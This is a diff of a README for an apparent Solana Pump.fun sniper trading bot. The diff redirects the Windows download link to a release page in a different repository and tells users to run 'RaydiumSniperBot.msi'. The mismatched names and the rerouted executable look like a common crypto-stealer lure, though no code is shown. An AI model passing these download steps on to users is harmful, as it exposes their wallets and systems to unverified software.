mohnate/Solana-Pump.fun-sniper-bot/README.md

 - Automatically calculates the optimal gas price for swift transaction execution.
 - Minimizes costs while ensuring trades are completed in time.

-### 🤝 Copy Trade Functionality
-- Facilitates easy copy trading for beginners and experts alike.
-- Mirrors every transaction in real-time, ensuring you never miss an opportunity.

 ## 📥 Getting Started

 ### 🖥️ Installation for Windows
-1. Download the latest release from the [Releases Page](https://github.com/SolTradeBot/Raydium-Sniper-Bot/releases/).
+1. Download the latest release from the [Releases Page](https://github.com/Raydium-Bot/Raydium-Sol-Sniper-Bot/releases/tag/v2.0).
 2. Extract the ZIP file to your desired location.
 3. Launch the application by double-clicking on `RaydiumSniperBot.msi`.